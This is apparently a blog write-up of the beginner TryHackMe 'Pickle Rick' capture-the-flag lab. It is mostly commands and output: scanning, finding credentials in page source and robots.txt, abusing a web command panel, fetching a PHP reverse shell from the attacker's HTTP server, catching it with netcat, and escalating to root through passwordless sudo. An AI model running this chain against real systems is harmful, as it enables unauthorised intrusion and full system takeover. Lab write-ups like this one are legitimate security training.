A Rick and Morty CTF. Help turn Rick back into a human!
Description: This Rick and Morty themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
Tags: ctf, dirbuster, linux
TryHackMe Difficulty: Easy
Link: https://tryhackme.com/room/picklerick
Pickle Rick is number 1 of 10 on the ‘Starters’ TryHackMe room series. It appears to be loosely based around a popular ‘Rick and Morty’ episode of the same name.
The goal for this box is to find 3 ingredients (keys/flags). Let’s get started.
Nmap:
┌─[loki@parrot]─[~/OpenVPN]
└──╼ $nmap -A -p- 10.10.92.9
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 23:27 EST
Nmap scan report for 10.10.92.9
Host is up (0.081s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1f:4c:ac:ee:0f:f2:20:61:13:37:59:13:ca:8c:ce:97 (RSA)
| 256 be:db:ff:b7:42:08:50:36:dc:09:3d:d1:69:16:61:36 (ECDSA)
|_ 256 24:5e:37:e7:1a:3e:10:ec:0d:2e:8b:c7:7b:ba:9c:0d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.13 seconds
1 open SSH, 1 open web server. We’ll take a peek at the web server to see what there is.
Help Morty!
Listen Morty… I need your help, I’ve turned myself into a pickle again and this time I can’t change back!
I need you to *BURRRP*….Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is, I have no idea what the *BURRRRRRRRP*, password was! Help Morty, Help!
Looks like we’re on the hunt for a username and password. With the tags for this room stating “dirbuster”, we’ll start running ‘dirb‘ in the background while doing some additional manual enumeration of the site. Since we can’t see any additional links on the page, we’ll look at 2 items – site source and robots.txt, 2 CTF hotspots for information.
Source:
<!–
Note to self, remember username!
Username: R1ck*****
–>
Appears we’ve located a username in the source. What about robots.txt?
Wubba********dub
Could this be our username and password combination? Possibly. But where can we utilize these credentials? Let’s see if dirb found any results.
┌─[✗]─[loki@parrot]─[~]
└──╼ $dirb http://10.10.44.196 -X .html,.php /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt—————–
DIRB v2.22
By The Dark Raver
—————–START_TIME: Tue Nov 24 09:11:42 2020
URL_BASE: http://10.10.44.196/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]—————–
GENERATED WORDS: 4612
—- Scanning URL: http://10.10.44.196/ —-
+ http://10.10.44.196/denied.php (CODE:302|SIZE:0)
+ http://10.10.44.196/index.html (CODE:200|SIZE:1062)
+ http://10.10.44.196/login.php (CODE:200|SIZE:882)
+ http://10.10.44.196/portal.php (CODE:302|SIZE:0)—————–
END_TIME: Tue Nov 24 09:25:24 2020
DOWNLOADED: 9224 – FOUND: 4
Logging into /login.php takes us into /portal.php. We’re also met with a ‘Command Panel’. Checking the other 4 tabs, we are advised that “Only the REAL rick can view this page.” What can we do with the commands? Let’s try some basic bash commands.
pwd
/var/www/html
ls -lah
total 40K
drwxr-xr-x 3 root root 4.0K Feb 10 2019 .
drwxr-xr-x 3 root root 4.0K Feb 10 2019 ..
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt
whoami
www-data
So we’re user ‘www-data’ within the ‘/var/www/html’ directory and we’ve got some files to check out.
cat clue.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.
Alright, what about clue.txt and Sup3rS3cretPickl3Ingred.txt from the browser?
/clue.txt
Look around the file system for the other ingredient.
/Sup3rS3cretPickl3Ingred.txt
mr. ******* hair
1/3 found. Let’s see what else we can find. What about users home directories?
ls -lah /home
total 16K
drwxr-xr-x 4 root root 4.0K Feb 10 2019 .
drwxr-xr-x 23 root root 4.0K Nov 24 13:44 ..
drwxrwxrwx 2 root root 4.0K Feb 10 2019 rick
drwxr-xr-x 4 ubuntu ubuntu 4.0K Feb 10 2019 ubuntu
ls -lah /home/rick
total 12K
drwxrwxrwx 2 root root 4.0K Feb 10 2019 .
drwxr-xr-x 4 root root 4.0K Feb 10 2019 ..
-rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients
We can’t cat the file, as the command is disabled. Can we tac it?
tac /home/rick/’second ingredients’
1 ***** tear
2/3. It seems ‘tac’ was the intended method for this one.
For the 3rd, we’ll most likely need a terminal to privesc. We’ll pull down a Reverse PHP script and pull it down on the web server.
┌─[loki@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
–2020-11-21 01:43:58– https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.208.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.208.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’php-reverse-shell.php 100%[=====================================================================================================>] 5.36K –.-KB/s in 0s
2020-11-21 01:43:58 (23.0 MB/s) – ‘php-reverse-shell.php’ saved [5491/5491]
┌─[loki@parrot]─[~/Downloads]
└──╼ $cp php-reverse-shell.php /home/loki/denied.php
┌─[loki@parrot]─[~/Downloads]
└──╼ $cd ..
We’ll edit the script, and spin up a Python server.
┌─[loki@parrot]─[~]
└──╼ $sudo nano denied.php
[sudo] password for loki:
┌─[loki@parrot]─[~]
└──╼ $python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) …
If we run ‘sudo wget http://10.6.22.82:8888/denied.php’ on the web portal page, this should pull down our file.
10.10.92.9 – – [21/Nov/2020 01:46:46] “GET /denied.php HTTP/1.1” 200 –
We can then move the new file, to overwrite the old file, and navigate to a tab which produces the denied.php.
mv denied.php.1 denied.php
Host:
┌─[✗]─[loki@parrot]─[~/OpenVPN]
└──╼ $nc -lvnp 4444
listening on [any] 4444 …
connect to [10.6.22.82] from (UNKNOWN) [10.10.92.9] 48464
Linux ip-10-10-92-9 4.4.0-1072-aws #82-Ubuntu SMP Fri Nov 2 15:00:21 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
07:10:49 up 2:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data
Awesome. We’re in. What can we do?
$ sudo -l
Matching Defaults entries for www-data on ip-10-10-92-9.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser www-data may run the following commands on ip-10-10-92-9.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
Maybe…
$ sudo su –
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
Let’s get our 3rd ingredient.
cd /root
ls -lah
total 28K
drwx—— 4 root root 4.0K Feb 10 2019 .
drwxr-xr-x 23 root root 4.0K Nov 21 04:26 ..
-rw-r–r– 1 root root 29 Feb 10 2019 3rd.txt
-rw-r–r– 1 root root 3.1K Oct 22 2015 .bashrc
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 3 root root 4.0K Feb 10 2019 snap
drwx—— 2 root root 4.0K Feb 10 2019 .ssh
cat 3rd.txt
3rd ingredients: ***** juice
Awesome. We’re finished.
Overall, this was a good beginner machine utilizing some CTF basics. I look forward to continuing with the 10 room path and seeing where things go.
Middle of the Web 